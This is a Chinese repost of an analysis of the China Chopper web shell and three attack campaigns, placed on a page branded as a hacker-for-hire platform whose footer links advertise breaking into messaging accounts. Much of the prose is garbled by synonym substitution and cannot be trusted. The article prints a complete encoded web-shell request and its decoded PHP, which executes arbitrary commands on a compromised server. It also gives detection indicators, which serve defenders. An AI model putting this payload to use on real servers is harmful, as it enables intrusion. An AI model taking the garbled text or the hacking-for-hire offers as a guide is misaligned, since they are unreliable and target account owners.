九年后“中国菜刀”依然锋利:China Chopper三起攻击案例分析-黑客接单平台

访客5年前黑客文章1306
曩昔发现的要挟常常会跟着时刻的推移而逐步退出于公众视界中,但China Chopper却坚持了持久的生命力。 在曩昔两年的时刻里,思科Talos团队观察到China Chopper很多活动的踪影,有数个要挟安排将China Chopper融入到其举动中,这表明,即便距China Chopper初次发现现已过了九年,对部分要挟行为者而言它却仍然能起到要害的效果。本文将挑选其间最活泼的三次举动来剖析。 China Chopper是一种web shell,能让进犯者经过包含操控方针所需一切逻辑的客户端应用程序保存对受感染体系的拜访权限。 China Chopper是广泛可用的,简直任何人都可以运用它。这也意味着,仅以China Chopper的存在作为方针,简直不或许将进犯归咎于某个特定集体。 China Chopper的“返老还童”也直接说明晰许多看似老旧要挟永久不会真实消失,互联网的防御者们不应当只把目光放到一些新的歹意软件上。 什么是China Chopper? China Chopper是一类东西,答应进犯者长途操控方针体系,条件是体系需求运转web服务器应用程序。Web shell可以在不同的渠道上运转,但在本例中,咱们只重视受感染的Windows主机。China Chopper已被证明由一些国家支撑的要挟集体,如Leviathan、Threat Group-3390等在运用。 在研讨中咱们发现,Internet Information Services (IIS)和Apache web服务器都受到过China Chopper web shell的进犯。咱们没有关于web shell是怎么装置的信息,可是考虑到有一些web应用程序结构,比方老版别的Oracle WebLogic或WordPress,它们傍边包含的长途代码履行缝隙或许使自己成了进犯方针。 China Chopper为进犯者供给了一个简略的GUI,答应他们装备到服务器的链接,并生成服务器端代码,这些代码有必要添加到方针网站的代码后才干进行通讯。 图1.China Chopper GUI 服务器端代码十分简略,只包含一行代码,依据应用程序渠道的不同有所改动。后门支撑.NET Active Server Pages或PHP。 以下是受感染的PHP应用程序的服务器端代码示例: 咱们并不能确认,服务器代码的如此简略是否是China Chopper开发人员为了添加检测的难度而故意为之,可是在短代码片段上运用形式匹配或许会发生一些误报。 China Chopper客户端运用HTTP POST恳求与受感染的服务器通讯。服务器端代码的仅有功用是评价在客户端GUI中装备服务器代码期间指定的恳求参数。在咱们的示例中,预期的参数名称是“test”。经过HTTP的通讯,可以很简单在捕获 *** 数据包后发现。 China Chopper包含一个长途shell(虚拟终端)功用,它首要会主张运用指令 'netstat an|find "ESTABLISHED."',在受感染体系上的进程创立日志中很或许会看到此指令。 图2.China Chopper首要主张的终端指令 当咱们剖析捕获的数据包时,可以看到参数“test”包含另一个eval句子。 依据该指令,客户端将提交必定数量的参数,z0一直到zn。在提交之前,一切参数都运用规范base64编码器进行编码。参数z0一直包含解析其他参数、发动恳求的指令并将成果回来给客户机的代码。 带参数的编码China Chopper POST恳求: test=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D&z1=Y21k&z2=Y2QgL2QgIkM6XHhhbXBwXGh0ZG9jc1xkYXNoYm9hcmRcIiZuZXRzdGF0IC1hbiB8IGZpbmQgIkVTVEFCTElTSEVEIiZlY2hvIFtTXSZjZCZlY2hvIFtFXQ%3D%3D 在此恳求中,解码的参数是: z0 - @ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c "{$s}"":"/c "{$s}"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?" ret={$ret} ":"";;echo("| 指令的结尾“&echo [S]&cd&echo [E]”好像出现在一切虚拟终端恳求中,可以作为一个牢靠的指示器来检测数据包捕获或行为日志中的China Chopper活动。 除了终端,China Chopper还包含一个文件管理器(可以创立目录、下载文件和更改文件元数据)、一个数据库管理器和一个根本的缝隙扫描器。 下面是咱们对三次举动的论说,它们别离有不同的方针、东西、技能及(或许不同的)要挟团伙。 图3.观察到的事例研讨的时刻表 事例研讨1:针对亚洲 *** 安排的特务举动 咱们在几回特务活动中确认了China Chopper的运用情况,其间一次针对亚洲 *** 安排的举动中,China Chopper被用于内部 *** ,装置在了一些用于存储秘要文档的Web服务器[1][2][3]黑客接单网

相关文章

515德州扑克黑客接单_黑客怎样找漏洞

在这一年之中,APT进犯最值得注意的展开是什么?咱们能够从中学到什么?2018年8月14日,微软发布了针对该缺点的体系补丁,对应的缝隙编号为CVE-2018-8414。 360要挟情报中心随后发布了运...

Web安全——前端JS表单验证过滤

前端JS表单验证过滤 前语 之前忙于做各种事情,现已很久没写过文章,最近接的一个校园的网站项目,近期被人用主动脚本攻破了(笑...),因为咱们第一次做这种上线的项目,彻底没有意识到一些web安全的...

黑客在线接单,程序员黑客联系方式,损友圈找黑客黑了你是什么意思

15高级职称考生报名.exe 英国0.02%[1][2][3][4][5][6][7][8]黑客接单渠道0x00 前语之所以叫固件,是由于这部分软件被贮存在手机的只读存储器内,用户只能读取其间的...

永久封号微信怎么恢复,黑客怎么用什么找肉鸡,广州靠谱的黑客在哪里找

所以已然要学审计那么缝隙原理是要搞理解的,这儿我就不再写缝隙原理了!(引荐php缝隙原理的文章: https://zhuanlan.zhihu.com/p/47818756)为了确认表格称号中指定字符...

微信密码忘了怎么登录,网上黑客qq微信联系方式,黑客找徒弟

request.open('GET', 'http://api.spreaker.com/whoami'); 首要设置一个Macros比方咱们输入用户名“admin’ or ‘a’=’a”,那么不管输...

赌博被骗叫别人多退两万属于敲诈吗?

2. 严格要求修复漏洞或缓解漏洞风险;· Windows 2003;赌博被骗叫别人多退两万属于敲诈吗?, 确保网络设置只允许可信的流量与Solr进行通信,特别是与DIH请求处理程序的通信。 攻击者可以...